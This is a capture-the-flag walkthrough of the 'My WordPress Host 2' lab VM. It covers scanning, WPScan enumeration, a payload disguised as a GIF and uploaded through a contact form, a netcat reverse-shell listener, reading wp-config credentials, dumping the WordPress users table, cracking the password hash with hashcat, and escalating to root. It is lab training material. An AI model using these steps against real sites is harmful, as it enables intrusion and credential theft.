My WordPress Host 2 -: Walkthrough Infosec Warrior
Today we’ll be continuing with our new machine on Infosec Warrior. In this article, we will see a walkthrough of an interesting Infosec Warrior machine called My WordPress Host 2.
here is the link to downlaod this VM:-
Network Scanning
We always start with network scanning, Let’s find the target IP address by running netdiscover.
┌─[✗]─[root@RDX]─[~]
└──╼ #netdiscover -i wlan0
As we saw in netdiscover result. Our target ip address is 192.168.43.94
Enumeration/Reconnaissance
Our next step is scanning the target machine. let’s start with nmap.
┌─[✗]─[root@RDX]─[~]
└──╼#nmap -v -sT 192.168.43.94
With the help of nmap we are able to scan all open tcp ports
Starting with the port number 80 which is http,
┌─[root@RDX]─[~]
└──╼ #vim /etc/hosts
open in browser http://192.168.43.94/
┌─[✗]─[root@RDX]─[~]
└──╼ #wpscan — url http://192.168.43.94/ — enumerate ap — plugins-detection Aggressive
go to with the site editor
Find the exploit on web
EXPLOIT —
convert payload name in gif or jpg .
upload the abc.gif payload in contact us
call the gif payload in browser
http://www.infosec.local/wp-content/uploads/2020/12/abc.gif
┌─[✗]─[root@RDX]─[~]
└──╼ #nc -nlvp 443
then use this payload in browser for reverse shell
now i got the shell
$ id
$ python3.7 -c ‘import pty;pty.spawn(“/bin/bash”)’
www-data@wordpress:/$
www-data@wordpress:/$ cd /var/www/html/wordpress
www-data@wordpress:/var/www/html/wordpress$ cat wp-config.php
/** MySQL database username */
define( ‘DB_USER’, ‘root’ );
/** MySQL database password */
define( ‘DB_PASSWORD’, ‘root’ );
Privilege Escalation
www-data@wordpress:/$ mysql -u root -p
mysql -u root -p
Enter password: root
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 19
Server version: 5.7.29 MySQL Community Server (GPL)Copyright © 2000, 2020, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.
mysql> show databases ;
mysql> use wordpress_db ;
mysql> show tables;
mysql> select * from wp_users ;
mysql> exit ;
┌─[root@RDX]─[~]
└──╼ #vim password.txt
$P$B19rxcYf6F/GwIJZ.OJuOvgtfjiWkW.
┌─[root@RDX]─[~]
└──╼ #hashcat -m 400 -a 0 -o pass.txt password.txt /root/rockyou.txt
hashcat (v6.1.1) starting…
* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause “CL_OUT_OF_RESOURCES” or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
* Device #2: WARNING! Kernel exec timeout is not disabled.
This may cause “CL_OUT_OF_RESOURCES” or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not SupportedCUDA API (CUDA 11.0)
====================
* Device #1: GeForce GTX 1650, 3844/3911 MB, 16MCUOpenCL API (OpenCL 1.2 CUDA 11.0.228) — Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: GeForce GTX 1650, skippedOpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) — Platform #2 [The pocl project]
=============================================================================================================================
* Device #3: pthread-AMD Ryzen 7 3750H with Radeon Vega Mobile Gfx, skippedMinimum password length supported by kernel: 0
Maximum password length supported by kernel: 256Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1Applicable optimizers applied:
* Zero-Byte
* Single-Hash
* Single-SaltATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 345 MB
Dictionary cache built:
* Filename..: /root/rockyou.txt
* Passwords.: 14344392
* Bytes…..: 139921507
* Keyspace..: 14344385
* Runtime…: 1 secCracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password- and salt-length (typically down to 32).* Append -w 3 to the commandline.
This can cause your screen to lag.* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/moreworkSession……….: hashcat
Status………..: Cracked
Hash.Name……..: phpass
Hash.Target……: $P$B19rxcYf6F/GwIJZ.OJuOvgtfjiWkW.
Time.Started…..: Wed Dec 30 20:32:08 2020 (25 secs)
Time.Estimated…: Wed Dec 30 20:32:33 2020 (0 secs)
Guess.Base…….: File (/root/rockyou.txt)
Guess.Queue……: 1/1 (100.00%)
Speed.#1………: 442.6 kH/s (6.68ms) @ Accel:32 Loops:64 Thr:1024 Vec:1
Recovered……..: 1/1 (100.00%) Digests
Progress………: 11010048/14344385 (76.76%)
Rejected………: 0/11010048 (0.00%)
Restore.Point….: 10485760/14344385 (73.10%)
Restore.Sub.#1…: Salt:0 Amplifier:0–1 Iteration:8128–8192
Candidates.#1….: XiaoNianNian -> Joytjiong1
Hardware.Mon.#1..: Temp: 49c Util: 65% Core:1620MHz Mem:3500MHz Bus:8Started: Wed Dec 30 20:32:00 2020
Stopped: Wed Dec 30 20:32:34 2020
┌─[root@RDX]─[~]
└──╼ #cat pass.txt
now i got the password
way to root the machine
www-data@wordpress:/var/www/html/wordpress$ su root
su root
Password: Linuxroot
root@wordpress:/var/www/html/wordpress# cd
root@wordpress:~# ls
root@wordpress:~# id
root@wordpress:~# cat proof.txt
Successfully got the root privilege and the ‘proof.txt’ flag.